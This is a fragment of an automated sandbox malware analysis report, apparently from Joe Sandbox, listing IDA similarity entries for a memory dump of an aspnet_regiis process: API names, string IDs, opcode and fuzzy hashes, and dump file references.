                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,-$57
                                                                    • API String ID: 0-1747932499
                                                                    • Opcode ID: 62bc8f93aa3435972451c34ca264805370b19504863b9c0023e6765b927822ac
                                                                    • Instruction ID: 925a28d70afe466d4652e9facb6786c998b1e190040f5006175e24c4fe81d53d
                                                                    • Opcode Fuzzy Hash: 62bc8f93aa3435972451c34ca264805370b19504863b9c0023e6765b927822ac
                                                                    • Instruction Fuzzy Hash: 86A1DCB16093409BD7249F25D89536BBBE2FF86358F444D2EE0C54B380E7B9840ACB93
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: AllocString
                                                                    • String ID: $ $)$*$-$.$0$1$<$=$B$C$I$M$O$R$\$a$h$n$q$y$|$}
                                                                    • API String ID: 2525500382-1673335896
                                                                    • Opcode ID: 065c42fdf88b443c89ef3febf08b83cc6402fc388a46178f4040b9330d5fdc67
                                                                    • Instruction ID: b6eb8b8f6f2de04fe10431c8967bcabfaa8c11821104470a2fba8f3ba5a0a064
                                                                    • Opcode Fuzzy Hash: 065c42fdf88b443c89ef3febf08b83cc6402fc388a46178f4040b9330d5fdc67
                                                                    • Instruction Fuzzy Hash: 4C91C66150C7C28EE3328A3C984879BBFD16BA3224F484A9ED5E94B2D3D7B54549C723
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: InitVariant
                                                                    • String ID: %$-$1$3$4$5$7$8$<$?
                                                                    • API String ID: 1927566239-2306056897
                                                                    • Opcode ID: 20f14f4c03e440dced3b83a6655623f2b0453975aa2bc5d130987b2d100db57d
                                                                    • Instruction ID: 9991442a937c49a520fba264f161c412ead8ea70fcd4e16ebc09686cbb18e7b1
                                                                    • Opcode Fuzzy Hash: 20f14f4c03e440dced3b83a6655623f2b0453975aa2bc5d130987b2d100db57d
                                                                    • Instruction Fuzzy Hash: D7511B7060C7C18AD33A8B3894997DABFD19BA6314F084A6ED1E98B3D2C6B44645CB53
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit
                                                                    • String ID: !$R$S$X$]$h$m$m$|
                                                                    • API String ID: 2610073882-107755797
                                                                    • Opcode ID: d3b2c0fd1852a0e7dcddfad4f218b81b1b4b15c78a93eb7b29b251627ba84d29
                                                                    • Instruction ID: 838189cfc0e707be83f7e39ef7d7bc1164232dd1f725e6e55be53c4ef9870389
                                                                    • Opcode Fuzzy Hash: d3b2c0fd1852a0e7dcddfad4f218b81b1b4b15c78a93eb7b29b251627ba84d29
                                                                    • Instruction Fuzzy Hash: 8841683110C7C18AD325DB78848879EFFD16BA6324F084A5DE5E10B3E6C7B98509CB63
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1924876076.0000000002441000.00000020.00000400.00020000.00000000.sdmp, Offset: 02440000, based on PE: true
                                                                    • Associated: 00000002.00000002.1924862519.0000000002440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924907662.0000000002484000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924922780.0000000002487000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1924939336.0000000002499000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_2440000_aspnet_regiis.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit
                                                                    • String ID: !$R$S$X$]$h$m$m$|
                                                                    • API String ID: 2610073882-107755797
                                                                    • Opcode ID: 63fc7c9f9d518277ed9287ab6be5c1156630d286838e99d2161f7808a571ea5e
                                                                    • Instruction ID: 63e34193176cf1f7ef2d081bf5191d1a5e3ffa5ead0d1294f203f70a711960d0
                                                                    • Opcode Fuzzy Hash: 63fc7c9f9d518277ed9287ab6be5c1156630d286838e99d2161f7808a571ea5e
                                                                    • Instruction Fuzzy Hash: F441273050C7C18AD3158A78944875EFFE26BD6324F484A5DE4E14B3E6D7B9840ACB63